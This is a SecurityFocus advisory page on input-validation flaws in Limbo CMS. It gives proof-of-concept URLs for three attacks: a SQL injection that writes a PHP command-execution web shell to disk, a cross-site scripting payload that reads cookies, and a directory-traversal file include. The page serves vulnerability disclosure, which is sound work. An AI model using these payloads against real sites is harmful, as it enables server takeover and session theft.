Search: Home Bugtraq Vulnerabilities Mailing Lists Jobs Tools Beta Programs

Limbo CMS Multiple Input Validation Vulnerabilities

No exploit is required.

The following proof of concept examples are available:

SQL injection:
http://www.example.com/[path]/index.php?_SERVER[]&_SERVER[REMOTE_ADDR]=999'UNION%20SELECT%20null,'<?php%20system($_G','ET[cmd]);?>'%20INTO%20DUMPFILE%20'[full_application_pa
th]shell.php'%20FROM%20lm_simple_stats/*&option=weblinks&Itemid=999/*

Cross-site scripting:
http://www.example.com/[path]/?_SERVER[]=&_SERVER[REMOTE_ADDR]=<script>alert(document.cookie)</script>

Local file include:
http://www.example.com/[path_to_limbo]/index2.php?option=frontpage/../../../../../../../../../../../script







 

Privacy Statement
Copyright 2009, SecurityFocus